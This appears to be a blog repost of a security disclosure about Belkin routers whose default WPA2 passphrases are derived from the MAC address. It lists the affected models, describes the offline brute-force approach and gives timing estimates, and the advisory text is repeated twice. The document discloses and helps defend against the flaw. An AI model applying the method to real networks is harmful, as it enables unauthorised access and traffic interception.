A number of Belkin wireless routers are shipped with a default WPA2
password to protect network connections. The apparently random passwords
are printed on a label that’s on the bottom of the router.
Although this approach should be, in theory, more secure, because the password is likely stronger than what many users would set themselves, it turns out that the random passphrases aren’t so random.
The researchers have determined that the password is based on the device’s WAN MAC address, and since this information is not so difficult to obtain, a remote attacker could easily hack into a targeted network – given that the default configuration is used.
The default password is made of 8 characters which can be determined by replacing each hex-digit of the WAN MAC address with another value from a static substitution table.
Several device models are affected, including Belkin N450 Model F9K1105V2 and Belkin Surf N150 Model F7D1301v1.
The experts claim to have contacted Belkin back in January, but since they haven’t received any response, they’ve made their findings public. In the meantime, they advise users to change their default passphrases to something stronger and, implicitly, more secure.
Vulnerability :
Having a preconfigured randomly generated WPA2-PSK passphrase for wireless routers is basically a good idea since a vendor-generated passphrase can be much more secure than most user-generated passwords. However, in the case of Belkin the default password is calculated solely based on the mac address of the device. Since the mac address is broadcasted with the beacon frames sent out by the device, a wireless attacker can calculate the default passphrase and then connect to the wireless network.
Each of the eight characters of the default passphrase are created by substituting a corresponding hex-digit of the wan mac address using a static substitution table. Since the wan mac address is the wlan mac address + one or two (depending on the model), a wireless attacker can easily guess the wan mac address of the device and thus calculate the default WPA2 passphrase.
Moreover, the default WPA2-PSK passphrase solely consists of 8 hexadecimal digits, which means that the entropy is limited to only 32 bits (or 33 bits since some models use uppercase hex digits). After sniffing one successful association of a client to the wireless network, an attacker can carry out an offline brute-force attack to crack the password. The program oclhashcat-plus can try 131,000 passwords per second on one high end GPU (AMD Radeon hd7970) [Link]. Doing a full search of the 32-bit key space takes about 9 hours at this rate.
An attacker can exploit this vulnerability to calculate the WPA2-PSK passphrase of a wireless network. This allows sniffing and decrypting all wireless traffic in a purely passive attack given that the attacker has also sniffed the association.
Belkin N900 Model F9K1104v1
Belkin N450 Model F9K1105V2
Belkin N300 Model F7D2301v1
Although this approach should be, in theory, more secure, because the password is likely stronger than what many users would set themselves, it turns out that the random passphrases aren’t so random.
The researchers have determined that the password is based on the device’s WAN MAC address, and since this information is not so difficult to obtain, a remote attacker could easily hack into a targeted network – given that the default configuration is used.
The default password is made of 8 characters which can be determined by replacing each hex-digit of the WAN MAC address with another value from a static substitution table.
Several device models are affected, including Belkin N450 Model F9K1105V2 and Belkin Surf N150 Model F7D1301v1.
The experts claim to have contacted Belkin back in January, but since they haven’t received any response, they’ve made their findings public. In the meantime, they advise users to change their default passphrases to something stronger and, implicitly, more secure.
Vulnerability :
Having a preconfigured randomly generated WPA2-PSK passphrase for wireless routers is basically a good idea since a vendor-generated passphrase can be much more secure than most user-generated passwords. However, in the case of Belkin the default password is calculated solely based on the mac address of the device. Since the mac address is broadcasted with the beacon frames sent out by the device, a wireless attacker can calculate the default passphrase and then connect to the wireless network.
Each of the eight characters of the default passphrase are created by substituting a corresponding hex-digit of the wan mac address using a static substitution table. Since the wan mac address is the wlan mac address + one or two (depending on the model), a wireless attacker can easily guess the wan mac address of the device and thus calculate the default WPA2 passphrase.
Moreover, the default WPA2-PSK passphrase solely consists of 8 hexadecimal digits, which means that the entropy is limited to only 32 bits (or 33 bits since some models use uppercase hex digits). After sniffing one successful association of a client to the wireless network, an attacker can carry out an offline brute-force attack to crack the password. The program oclhashcat-plus can try 131,000 passwords per second on one high end GPU (AMD Radeon hd7970) [Link]. Doing a full search of the 32-bit key space takes about 9 hours at this rate.
An attacker can exploit this vulnerability to calculate the WPA2-PSK passphrase of a wireless network. This allows sniffing and decrypting all wireless traffic in a purely passive attack given that the attacker has also sniffed the association.
Affected device :
Belkin Surf N150 Model F7D1301v1
Belkin N900 Model F9K1104v1
Belkin N450 Model F9K1105V2
Belkin N300 Model F7D2301v1
Post a Comment
I'm certainly not an expert, but I'll try my hardest to explain what I do know and research what I don't know. Be sure to check back again , after moderation i do make every effort to reply to your comments .